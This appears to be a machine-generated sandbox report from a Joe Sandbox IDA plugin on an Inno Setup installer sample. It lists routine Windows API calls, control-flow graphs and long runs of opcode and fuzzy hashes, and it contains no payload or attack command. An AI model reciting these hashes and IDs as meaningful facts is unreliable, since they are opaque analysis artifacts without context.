                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID: .tmp$Win32s
                                                                                  • API String ID: 2030045667-641751118
                                                                                  • Opcode ID: dbd713808ee5cd3b1fa916ccce7d3bf4afe9645a7df72659ccb3e571c904255c
                                                                                  • Instruction ID: 67cde150eb0af80a0684d3513e922465350d3be20a6f890f7a892fbb838d3829
                                                                                  • Opcode Fuzzy Hash: dbd713808ee5cd3b1fa916ccce7d3bf4afe9645a7df72659ccb3e571c904255c
                                                                                  • Instruction Fuzzy Hash: AC416C706042449FD701EF66DE52A6A77A5EB89708F50443AF900B73E2CB79AC00CFAD

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040903F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F96
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040903F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F9F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID: .tmp
                                                                                  • API String ID: 1375471231-2986845003
                                                                                  • Opcode ID: 819e509da3935fcb07b56e51cd4c448ce7e4960229b85e97640e07660920be5f
                                                                                  • Instruction ID: ce5fb8886f90a53b9734c1240a6a579807e0e8bdec988ff2fdb780870144a57b
                                                                                  • Opcode Fuzzy Hash: 819e509da3935fcb07b56e51cd4c448ce7e4960229b85e97640e07660920be5f
                                                                                  • Instruction Fuzzy Hash: BB213A74A002099BDB05FBA5C9429EFB7B9DF44304F50457BE501B73C2DA7C9E058A69

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 203 407320-40733e ReadFile 204 407340-407344 203->204 205 407357-40735e 203->205 206 407350-407352 call 40730c 204->206 207 407346-40734e GetLastError 204->207 206->205 207->205 207->206
                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(?,Inno Setup Setup Data (5.1.2),00000040,?,00000000,00000040,Inno Setup Setup Data (5.1.2),00000040,00000000,00407374,?,?,?,00409914,00000000,00409E2E), ref: 00407337
                                                                                  • GetLastError.KERNEL32(?,Inno Setup Setup Data (5.1.2),00000040,?,00000000,00000040,Inno Setup Setup Data (5.1.2),00000040,00000000,00407374,?,?,?,00409914,00000000,00409E2E), ref: 00407346
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastRead
                                                                                  • String ID: Inno Setup Setup Data (5.1.2)
                                                                                  • API String ID: 1948546556-3777945815
                                                                                  • Opcode ID: 8fdca7fb62a8be59f144541c507ef726b851efe08f7587ae6877d6daee803a68
                                                                                  • Instruction ID: 74f57cb7c68d0f328c58ce9db76203911d8604c5fab471400a7bbf7442446d63
                                                                                  • Opcode Fuzzy Hash: 8fdca7fb62a8be59f144541c507ef726b851efe08f7587ae6877d6daee803a68
                                                                                  • Instruction Fuzzy Hash: D7E092626081106AEB20A69A9CC4FAB67DCCBC5324F08407BFD08DB281C678DC04D37A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 209 407b9c-407bc9 211 407bd5-407be6 209->211 212 407bcb-407bd0 call 407ab0 209->212 215 407bf2-407bf6 211->215 216 407be8-407bed call 407ab0 211->216 212->211 218 407c01-407c06 call 407ab0 215->218 219 407bf8-407bff 215->219 216->215 220 407c0b-407c0f 218->220 219->218 219->220 222 407c11-407c16 call 407ab0 220->222 223 407c1b-407c24 220->223 222->223 224 407c33-407c39 223->224 225 407c26-407c31 223->225 227 407c46-407c60 call 408794 224->227 228 407c3b-407c44 224->228 225->224 225->225 231 407c62-407c65 227->231 232 407c66-407c74 227->232 228->227 228->228 231->232 233 407ca3-407cda call 408140 232->233 234 407c76-407c96 call 407b40 VirtualAlloc 232->234 239 407cdc 233->239 240 407d0e-407d29 call 403198 233->240 241 407c98 call 4057cc 234->241 242 407c9d-407ca0 234->242 243 407ce0-407cea call 407ab0 239->243 244 407cde-407d09 call 4050dc call 407a38 239->244 241->242 242->233 243->240 244->240
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407C8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: -$LzmaDecoderInit failed (%d)
                                                                                  • API String ID: 4275171209-4285503710
                                                                                  • Opcode ID: cc42c1307f6811fa119b191e100c4541c8074d19396e7c15a8fa13a926c2c12f
                                                                                  • Instruction ID: 55aea7a7bb3a5a02f02858533e7bdda5dc254a624bb462129494e45bc2647201
                                                                                  • Opcode Fuzzy Hash: cc42c1307f6811fa119b191e100c4541c8074d19396e7c15a8fa13a926c2c12f
                                                                                  • Instruction Fuzzy Hash: E6515370E082089FEB11DFA9C48579EBBB5EF45304F1444BAE505F72C2D678AD418BAA

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 255 406d70-406dc3 SetErrorMode call 403414 LoadLibraryA
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406D7A
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406DC4,?,00000000,00406DE2,?,00008000), ref: 00406DA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                  • String ID:
                                                                                  • API String ID: 2987862817-0
                                                                                  • Opcode ID: 5d7e07e33520bf98b425e0c681bb4dc820f191272a92cf17af4b67f45ac41a74
                                                                                  • Instruction ID: c155b58eea131e1c6af0ee18d5f7d7e4136a9135fd196cc1df3211d2c6b6533e
                                                                                  • Opcode Fuzzy Hash: 5d7e07e33520bf98b425e0c681bb4dc820f191272a92cf17af4b67f45ac41a74
                                                                                  • Instruction Fuzzy Hash: DCF08270614748BFDB029F768C6282ABBECEB4DB1475348B6F900A26D2E53C8D20C564

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 259 4073a0-4073c5 SetFilePointer 260 4073d7-4073dc 259->260 261 4073c7-4073ce GetLastError 259->261 261->260 262 4073d0-4073d2 call 40730c 261->262 262->260
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004073BF
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 004073C7
                                                                                    • Part of subcall function 0040730C: GetLastError.KERNEL32(004070D4,00407169,?,?,020703AC,?,00409879,00000001,00000000,00000002,00000000,00409E50,?,00000000,00409E9A), ref: 0040730F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: d52d5b1e930c1982747f6eb175dab7ffd6b70b816e8e77c977a96c85253ba806
                                                                                  • Instruction ID: 9847ec36335d13f9f831c01d07716a15762957598a29e66a48121cfa39c014b4
                                                                                  • Opcode Fuzzy Hash: d52d5b1e930c1982747f6eb175dab7ffd6b70b816e8e77c977a96c85253ba806
                                                                                  • Instruction Fuzzy Hash: 65E092766081005BE600D59DD881A9B73DCDFC5364F04423ABE58EB1D1D675EC00C376

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 264 407204-407225 SetFilePointer 265 407237-407239 264->265 266 407227-40722e GetLastError 264->266 266->265 267 407230-407232 call 40730c 266->267 267->265
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00409E9E,00000001,00000000,00000001,0040777F), ref: 0040721B
                                                                                  • GetLastError.KERNEL32(?,00000000,00409E9E,00000001,00000000,00000001,0040777F), ref: 00407227
                                                                                    • Part of subcall function 0040730C: GetLastError.KERNEL32(004070D4,00407169,?,?,020703AC,?,00409879,00000001,00000000,00000002,00000000,00409E50,?,00000000,00409E9A), ref: 0040730F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: 0fa2031affbb67b4cdfc51548481a7e9debdf2eb8a49f19f9c34c43aa13cce6a
                                                                                  • Instruction ID: 846c300defedd398003e8392b0c4a7365f88fedf85f33764f745eeeb2fc6d69d
                                                                                  • Opcode Fuzzy Hash: 0fa2031affbb67b4cdfc51548481a7e9debdf2eb8a49f19f9c34c43aa13cce6a
                                                                                  • Instruction Fuzzy Hash: 04E04FB16002109FEB10EEB589C1B5273D89F45364F0486BAFA54DF2C6D274DC00C7A6

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 329 401430-40143d 330 401446-40144c 329->330 331 40143f-401444 329->331 332 401452-40146a VirtualAlloc 330->332 331->332 333 40146c-40147a call 4012e4 332->333 334 40148f-401492 332->334 333->334 337 40147c-40148d VirtualFree 333->337 337->334
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 2087232378-0
                                                                                  • Opcode ID: 25ebca3973117aaf4b6b0bbfc0cb5b768a232a2d2220db46d15d82c892c83aa2
                                                                                  • Instruction ID: 0a9bdec6e0d4ada2bc80af5311ae0c0d9c5226b5e0cec20c8283fd4eb37d5a7f
                                                                                  • Opcode Fuzzy Hash: 25ebca3973117aaf4b6b0bbfc0cb5b768a232a2d2220db46d15d82c892c83aa2
                                                                                  • Instruction Fuzzy Hash: 0FF02772B0032017DB20696A0CC1B536AC59F85B90F1540BBFA4CFF3FAD2B98C0042AD

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004052FE), ref: 004051E7
                                                                                    • Part of subcall function 00404C24: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C41
                                                                                    • Part of subcall function 00405154: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,0040521F,?,00000000,004052FE), ref: 00405172
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1658689577-0
                                                                                  • Opcode ID: ab4cd4cd92faed37c4b620e917d3e358d7c6202a159f55483092414e11f34e9b
                                                                                  • Instruction ID: 1d6ccd34fb836f3c71a42970551c8f48c2e8742e1fefc428fca99597960f6a4e
                                                                                  • Opcode Fuzzy Hash: ab4cd4cd92faed37c4b620e917d3e358d7c6202a159f55483092414e11f34e9b
                                                                                  • Instruction Fuzzy Hash: 30313F71E00109ABCF00EB55CCC19DEB7B9EF84304F158577E815BB385E779AA058B98
                                                                                  APIs
                                                                                  • CharPrevA.USER32(00000000,00000000,?,?,?,00000000,004067DA,00000000,00406800,?,?,?,?,00000000,?,00406815), ref: 0040677C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrev
                                                                                  • String ID:
                                                                                  • API String ID: 122130370-0
                                                                                  • Opcode ID: 37ae01788ccb5f20150df5d7b377b33bba13ece02a6ce5e8dc5f89b42cac98fa
                                                                                  • Instruction ID: 26fe87f4d858879345adbe97df926da4af7a77d46a71bb4c335bae6a5d1be281
                                                                                  • Opcode Fuzzy Hash: 37ae01788ccb5f20150df5d7b377b33bba13ece02a6ce5e8dc5f89b42cac98fa
                                                                                  • Instruction Fuzzy Hash: E9F0E2213009241BC611797F18C1AAFA78C8B8675D751007FF506EB383DD3EAE13529E
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004071F8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 2ce0f8f730728ee4aa7db3a24a84b86e0fa00de5f1024dddb0088281a627a2fc
                                                                                  • Instruction ID: 3f026ddc5340b3b02b73ab5decf8e1622a5f073ac7e2c7f6c971bace02a5cfe3
                                                                                  • Opcode Fuzzy Hash: 2ce0f8f730728ee4aa7db3a24a84b86e0fa00de5f1024dddb0088281a627a2fc
                                                                                  • Instruction Fuzzy Hash: 93E06D713042082EE3409AFC6D41FA677DC9309314F008032B988DB342D4759D208BA8
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004071F8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: b99fbc5ff1da4398e8f8362ab77bf2182ead81226adf720b49294c11351bcaa3
                                                                                  • Instruction ID: 69158463595a77c8f11caa8ec6194b57660c691025ea005c5580a442b747b7b4
                                                                                  • Opcode Fuzzy Hash: b99fbc5ff1da4398e8f8362ab77bf2182ead81226adf720b49294c11351bcaa3
                                                                                  • Instruction Fuzzy Hash: 2DE092713042082ED340DEFC7D41F9677DC9309314F008032B988DB342D4759D208BA8
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,02094000,000A1E00,?,00000000,000A1E00,?,?,02094000,00409C5D), ref: 00407413
                                                                                    • Part of subcall function 0040730C: GetLastError.KERNEL32(004070D4,00407169,?,?,020703AC,?,00409879,00000001,00000000,00000002,00000000,00409E50,?,00000000,00409E9A), ref: 0040730F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442123175-0
                                                                                  • Opcode ID: 024c1dbc51d9d56445248a5641ebfab788c56811afa19e4740f31fd3b9e459d0
                                                                                  • Instruction ID: 4cf02b4f97fd2dd3f3239bf2be9eee35ebb233a52292f9b2b98ca2a8342e6b11
                                                                                  • Opcode Fuzzy Hash: 024c1dbc51d9d56445248a5641ebfab788c56811afa19e4740f31fd3b9e459d0
                                                                                  • Instruction Fuzzy Hash: CFE012767081106BDB10E65EDC80FA767ECDFC5764F00407BBA48DB255D574AC05C6B6
                                                                                  APIs
                                                                                    • Part of subcall function 00406754: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,004067DA,00000000,00406800,?,?,?,?,00000000,?,00406815), ref: 0040677C
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406800,?,?,?,?,00000000,?,00406815,00406B4F,00000000,00406B94,?,?,?), ref: 004067E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesCharFilePrev
                                                                                  • String ID:
                                                                                  • API String ID: 4082512850-0
                                                                                  • Opcode ID: 399ec9302de400c87f70028905c1b89ae4bed45fe68263b4dce3420f27efd592
                                                                                  • Instruction ID: 6c3e4dbec9b56b4e144a7c3eb597e7774661ec489cbd0129078cd23c6cba8f7e
                                                                                  • Opcode Fuzzy Hash: 399ec9302de400c87f70028905c1b89ae4bed45fe68263b4dce3420f27efd592
                                                                                  • Instruction Fuzzy Hash: 77E09B713043047FE711FF62DC52E59B7ECD789704B624876B501E7682D6786E10C468
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00408D47,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00408D5D), ref: 00407073
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: b70ba4e408eb891fc15851977d6c78121b1130dd0c35cb40219c554fbad05809
                                                                                  • Instruction ID: 8a108937654cb9ec8b2f8af9ac4010dc3b9b8d7932e2ec1a8cf1e67f339d0bc0
                                                                                  • Opcode Fuzzy Hash: b70ba4e408eb891fc15851977d6c78121b1130dd0c35cb40219c554fbad05809
                                                                                  • Instruction Fuzzy Hash: EDE0D8E1B8830125F61501684C87F7B26094780700F10823A7B50EE3D2D9BEA506419F
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNEL32(?,02094000,00409C3D), ref: 004073E7
                                                                                    • Part of subcall function 0040730C: GetLastError.KERNEL32(004070D4,00407169,?,?,020703AC,?,00409879,00000001,00000000,00000002,00000000,00409E50,?,00000000,00409E9A), ref: 0040730F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 734332943-0
                                                                                  • Opcode ID: 36ffee99ca73f57dffc44ffc41feffe16eef8116da98e048bed1c14e5daca295
                                                                                  • Instruction ID: ecd8db41b9a064975d95c4189f635641772f3a130a221361a75dc60abd3a7d2f
                                                                                  • Opcode Fuzzy Hash: 36ffee99ca73f57dffc44ffc41feffe16eef8116da98e048bed1c14e5daca295
                                                                                  • Instruction Fuzzy Hash: BCC04CA160414047DB00A6AE89D1A0763D85A48248340407ABD04DB256D678E800E665
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,00406DE9), ref: 00406DDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: e53dc258edad46faec1d5d99b9808e32c15e54273085802cc36916ca7ce743d7
                                                                                  • Instruction ID: 1d72a40a7162af5e61dd36ede5f521d1df62cecaa15e7f70a5f124a5836bdc79
                                                                                  • Opcode Fuzzy Hash: e53dc258edad46faec1d5d99b9808e32c15e54273085802cc36916ca7ce743d7
                                                                                  • Instruction Fuzzy Hash: 61B09B7A71C2005DE70996D5792255867D4D7C47103E1457BF104D65C1D53CD410851C
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,00406DE9), ref: 00406DDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 753b5ca2bb2187018ad4f4294cccf67dc734dae70cdf4d4520e050676b3a8a1f
                                                                                  • Instruction ID: 33f935d7d5035e1e6c64ae212d5bb8aa7363dfd1a838aa31d315555187c46287
                                                                                  • Opcode Fuzzy Hash: 753b5ca2bb2187018ad4f4294cccf67dc734dae70cdf4d4520e050676b3a8a1f
                                                                                  • Instruction Fuzzy Hash: 3CA022A8E00000B2CE00B2E0802080CB3282E883003C00AA2320AB20C2C03CC000220C
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,004018BF), ref: 004016B2
